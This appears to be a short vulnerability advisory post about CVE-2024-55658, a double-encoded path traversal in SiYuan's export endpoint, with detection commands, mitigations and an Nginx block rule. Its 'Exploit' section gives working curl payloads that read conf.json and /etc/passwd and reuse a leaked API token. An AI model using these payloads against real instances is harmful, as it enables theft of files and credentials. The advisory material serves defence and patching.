SiYuan, Path Traversal, CVE-2024-55658 (Critical)

Listen to this Post

The vulnerability is caused by improper handling of user-supplied paths in the `/export` endpoint. The code in `session.go` grants administrative privileges to requests for `/export/` when originating from localhost . Subsequently, in serve.go, the application takes the request path, removes the `/export/` prefix, and performs a URL decode using url.PathUnescape. The resulting path is then joined with `exportBaseDir` to read the file. An attacker can bypass simple directory traversal filters by double-encoding the dot-slash sequence (%252e%252e). The initial web server or filter might not catch this because it doesn’t match a literal `../` after a single decode, but the application’s explicit `PathUnescape` call decodes it once, transforming it into ../. The code then uses `filepath.Join` without verifying that the final absolute path still resides within the intended exportBaseDir, leading to arbitrary file system read access . This is exacerbated by permissive CORS headers, allowing data exfiltration from a victim’s local instance by a malicious website.

dailycve form:

Platform: SiYuan
Version: < 3.1.16
Vulnerability : Path Traversal
Severity: Critical
date: 2024-12-10

Prediction: 2024-12-17

What Undercode Say:

Analytics:

  • Monitor access logs for `%252e%252e` patterns.
  • Use `grep` to search for double-encoded sequences.
    sudo grep -E 'GET \/export\/(%25)2e%252e' /var/log/siyuan/access.log
    
  • Track file access outside workspace boundaries.
  • Set up alerts for CORS origin anomalies.
  • Audit code for `PathUnescape` without path validation.
  • Check for processes reading sensitive config files.
    sudo auditctl -w /path/to/siyuan/conf/conf.json -p wa -k siyuan_config
    

Exploit:

Exploit for CVE-2024-55658 - Read sensitive configuration file
curl "http://localhost:6806/export/%252e%252e/%252e%252e/conf/conf.json"
Read system password file
curl "http://localhost:6806/export/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd"
Use leaked API token to verify admin API access
curl -X POST "http://localhost:6806/api/system/getNetwork" \
-H "Authorization: Token <leaked_api_token>" \
-H "Content-Type: application/json"

Protection from this CVE:

  • Immediately upgrade to SiYuan version 3.1.16 or later .
  • Implement strict path validation by verifying `filepath.Abs(fullPath)` starts with filepath.Abs(exportBaseDir).
  • Remove administrative auto-grant for localhost requests on export endpoints.
  • Restrict CORS headers to trusted origins only.
  • If immediate patching is not possible, block requests containing `%25` in the path.
    Example Nginx rule to block double-encoded traversal attempts
    if ($request_uri ~ "/export/.%25") {
    return 403;
    }
    

Impact:

This critical vulnerability allows unauthenticated attackers to read arbitrary files from the server, leading to the exposure of API tokens, cookie signing keys, and access authentication codes . With these secrets, attackers can gain administrative access to the SiYuan kernel API. In chained attacks, this could potentially escalate to remote code execution. Due to permissive CORS settings, malicious websites can also exploit this flaw against local instances.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top